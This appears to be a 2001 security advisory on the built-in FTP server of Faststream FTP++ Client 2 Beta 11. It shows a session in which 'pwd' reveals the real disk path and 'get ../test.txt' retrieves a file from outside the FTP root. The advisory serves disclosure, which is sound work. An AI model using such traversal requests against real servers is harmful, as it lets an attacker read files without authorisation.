Faststream FTP++ Client 2 Beta 11 (build in server) Vulnerability

[se00020 () LION CC]

Faststram FTP built in server responds with the real 
path of directory
instead of a virtual one.It is possible to get files 
outside of root.dir.

e:\crap was used as root directory

1. directory path

230 User anonymous logged in.
ftp> pwd
257 "/E:/crap/" is current directory.

2. getting files from outside of root

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
-rw-rw-rw-   1 ftp      ftp            6 Mar 02 12:33 
movedtohomedir.txt
-rw-rw-rw-   1 ftp      ftp           11 Mar 02 00:29 
bisontest.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 03 15:59 HTTP
drw-rw-rw-   1 ftp      ftp            0 Mar 03 17:05 huhu
226 File sent ok
FTP: 438 Bytes empfangen in 0,00Sekunden 
438000,00KB/s
ftp> get ../test.txt
200 Port command successful.
150 Opening data connection for ../test.txt.
226 File sent ok
FTP: 15 Bytes empfangen in 0,01Sekunden 1,50KB/s

Solution:
no quick fix possible.Use with care.

Author has been contacted on 04.Mar.2001

se00020 () fhs-hagenberg ac at
se00020 () lion cc